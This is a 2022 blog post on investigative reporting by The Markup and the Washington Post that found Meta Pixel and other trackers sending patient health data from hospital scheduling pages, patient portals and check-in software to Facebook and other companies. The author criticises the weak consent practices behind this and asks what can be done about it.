Back To Good Reads

Do You Know Where Your Health Data is Going? You Should.

October 18, 2022 Janice Karin

One of the biggest criticisms of the CMS mandated Patient Access APIs we heard was that it moves protected health data outside of the purview of HIPAA and thus patient privacy could be freely violated. Many want HIPAA or HIPAA-like protections extended to third parties handling health data. That argument might hold more weight if HIPAA was actually protecting the health information of patients at organizations who are bound by its rules. Sadly, that's not always the case.


In the past few weeks investigative reporters published three articles showing just how badly some of our healthcare organizations are violating patient privacy. These articles addressed data tracking and collection software placed on provider websites allowing online patient appointment scheduling, placed in patient portals, and placed in patient check-in software used by providers. They sent data to Facebook, to Google, to Amazon, to Oracle, and elsewhere (including to at least one data broker). Some of their websites included session trackers potentially recording every click made on those pages.

Two [1] [2] of the three articles were from The Markup, a non-profit newsroom doing data-driven reporting on how technology affects society. The third - a more narrow look specifically at one patient check-in application (Phreesia) - was by the Washington Post. The Markup articles, in particular, explain their investigative process and findings in detail, backing them up with data and evidence. They are compelling and horrifying at the same time.

Both of these scenarios involve the transfer and collection of PHI. In the case of Facebook, this is done without consent and entirely outside of the HIPAA framework. In the case of Phreesia (which typically signs Business Associate Agreements with its users to access the data), selling the data is ostensibly done with patient consent and under the guise of offering more personalized service to the patient. However, the consent is buried deep within a longer consent form that's part of the check-in process and, unless you are used to reading and absorbing every word of lengthy consent forms, likely to be dismissed as consenting to the visit.

The Markup research is particularly interesting. They looked at Newsweek's 100 Top Hospitals and found that 33 of them use Meta Pixel, tracking software that sends Facebook data whenever buttons are clicked where it's installed. Even if a user isn't logged in or hasn't provided their identity yet, the packet includes IP addresses which often are static and can be used to identify a patient or household.

The Markup contacted each of the 33 hospitals with the tracker and gave them the chance both to respond and to remove the tracker. These include many of the most well known and prestigious hospitals across the country including some here in Massachusetts. Only a few of the hospitals they contacted removed the software and even fewer responded to the request for comment (mostly with generic statements about taking patient privacy seriously).

When installed on pages used for online scheduling, the information shared typically included the text of the button clicked, the search term supplied or condition selected to generate the list of available appointments, and the name of the doctor selected for treatment. This is bad enough, but it is mainly inferred information rather than direct patient information (searching for a doctor to see about Alzheimer's doesn't necessarily mean the patient has Alzheimer's - but they almost certainly have some related symptoms). However, if follow up appointments are also made using this mechanism rather than just initial appointments attached to clinician discovery, the inference becomes a lot stronger. Knowledge of frequency of appointments can also be extremely useful in terms of knowing when a particular condition is bothering a patient, how severe their case is, or similar.

However, in addition to scheduling pages, 7 of the hospitals they examined also used Meta Pixel in their online patient portal. This was discovered using patient volunteers who consented to have information about Meta Pixel usage and the related data sent to The Markup in order to discover what's being collected. In these cases actual, direct patient health data was sent via the Meta Pixel tracker. This includes names of medications taken by patients, descriptions of the their allergic reactions, and details about upcoming scheduled appointments. 5 of the 7 removed the tracker from their patient portals after being contacted by The Markup.

The Markup bent over backwards to be fair to the hospitals in question. There are some limited circumstances where this type of data collection is legal without patient consent, but it nearly always requires explicit patient consent (see Phreesia comments above). They contacted all of the involved organizations to see if the types of contracts that would allow this type of data collection were in place. Neither Meta/Facebook nor any of the hospitals said these contracts existed. There was no evidence that consent was collected (even obscurely) from website or portal visitors, the other legal avenue to data collection. We wonder, though - even if a business agreement of some sort is in place to allow data transfer, does that absolve the companies for the need for separate consent to track user interactions with the system?

In their second article, The Markup did a deep dive of the tracking found at a large network of children's hospitals. In addition to Meta Pixel sending data to Facebook and also finding a Google analytics tracker, they found 25 ad trackers, 38 cookies, and signs of keystroke collection. A Meta spokesperson said that sending sensitive data via Meta Pixel is against policy and that health data is supposedly blocked from storage, but they did not comment on how they define health data or whether the data from this organization (or any of the others) was actually filtered out. Given that the only data being collected from either the scheduling sites or the patient portals is health information, it strains credulity to believe that none of it was retained or used.

These incidents are disturbing. While we all know people should be more vigilant about reading consent forms, that doesn't help when no consent forms exist. Further, if a patient needs care and is presented with a form to sign, most will sign it rather than walk away from an appointment. This is doubly true for people who have been waiting a long time for an appointment, have taken time off of work or arranged for childcare (or both), or who have otherwise spent time, energy, and money to make the appointment happen. Further, these forms are long, technical, written in the Legalese dialect of English, and require a lot of patience and experience for non-lawyers to understand. When presented amidst a slew of other forms, particularly other forms that seem more directly relevant to a visit such as health history or collection of current symptoms, and especially when under a time crunch to complete the annoying paperwork so you can get to the important parts of a visit, how many people are actually going to read and understand every clause and sentence of a consent?

That doesn't even get into other equity and accessibility issues. Will staff read a long and complex form to a patient who can't see it? Is someone even available to do this before a visit starts for a telehealth visit? Are consent forms available in other languages? Are non-technically savvy users able to understand the implications of what they're being asked to sign? And so on.

In the case of check-in software, the data isn't just collected to be sold (although it is). It's used to promote possibly relevant prescription drugs and similar products to patients right before they see a clinician for the conditions these products treat. Putting aside any questions about whether advertising prescription drugs should be allowed, this type of advertisement is disruptive to the care process. In this era of limited time for appointments, it invites patients to waste time by asking their clinicians about those products they were just told might help them. Furthermore, since that happened within the framework of their appointment, a patient might be forgiven for thinking that their medical providers approved of the advertisement and therefore were just reminding them to ask about something that has already been deemed appropriate for their care. Perhaps every so often the advertised product is a good fit for the patient, but that won't always be the case and it will be harder to convince the patient that they shouldn't get that product when they were just told - under the imprimatur of the hospital - that they should.

Even more disturbing is sending health-related data to Facebook without consent. This data gets used for everything - every part of a person's life in 21st Century America is affected by the way Facebook interconnects data. This is bad enough when permission is given or when a patient has some reasonable expectation that Facebook could see the data, but it is unconscionable when they have every reason to think the data is hidden from prying eyes. Knowing what types of medical appointments a patient is trying to make allows Facebook to infer a lot about the type of ads to show that patient or other places that might be interested in buying their data. Knowing the doctors the patient chooses to see could allow Facebook to infer information about the types of people the patient trusts, especially if there are demographic similarities between their various clinicians. Knowing the search terms they use allows Facebook to understand and analyze their specific word patterns and both identify them in other contexts and frame language it presents in an inherently more comfortable flow for that specific person (we don't know if this type of analysis is happening but it could).

The most disturbing case of all is the intrusion of these trackers into patient portals. One could argue that online appointment scheduling is happening in the open and thus a savvy person should assume it might be monitored (we reject this argument but it is something that some believe), but there is no one who could legitimately argue that information inside password protected software deliberately designed to hold PHI is appropriate to share with Facebook under these circumstances. In general, the data collected by appointment scheduling leads to inferences (sometimes strong inferences) but data from a patient portal is explicit, factual data about that patient. It is much more valuable and patients have a reasonable expectation that it's well protected. They have been told repeatedly that it's well protected. They have been told repeatedly that it's illegal for it not to be well protected. And yet, here we are.

Will an article in the Washington Post - as highly regarded and widely read as that outlet is - force check-in software to change its behavior? Even if it does, how many more companies with peripheral interactions with the healthcare system are doing similar things? We doubt it will land at all with Facebook or Meta, but will a fantastic, well researched, and well backed up report in the less widely read The Markup change the behavior of hospital systems across the country? Even if these particular trackers sharing data about these particular interactions are removed, who's to say there aren't others in place?

Consent forms are long and difficult to understand and problematic and need to be improved, but how do we deal with data sharing outside of consent? We've all heard and rely on security by obscurity, but this is lack of privacy by audacity. We shouldn't have to seek out and monitor every single interaction in every single system in every single provider or payer or other healthcare organization in the country to be confident that our health data isn't being shared without our consent. We shouldn't have to rely on volunteers who allow investigative journalists access to their private health information to prove privacy violations once we suspect they're happening. Limiting advertising of prescription drugs and prescription-only medical devices would help as they take away a major market for the data, but there are always venues that would find health data useful. We can always publicly shame companies, but that only goes so far if they're willing to be audacious - and memories fade. What else can we do? We'd love to hear your thoughts.

Share This: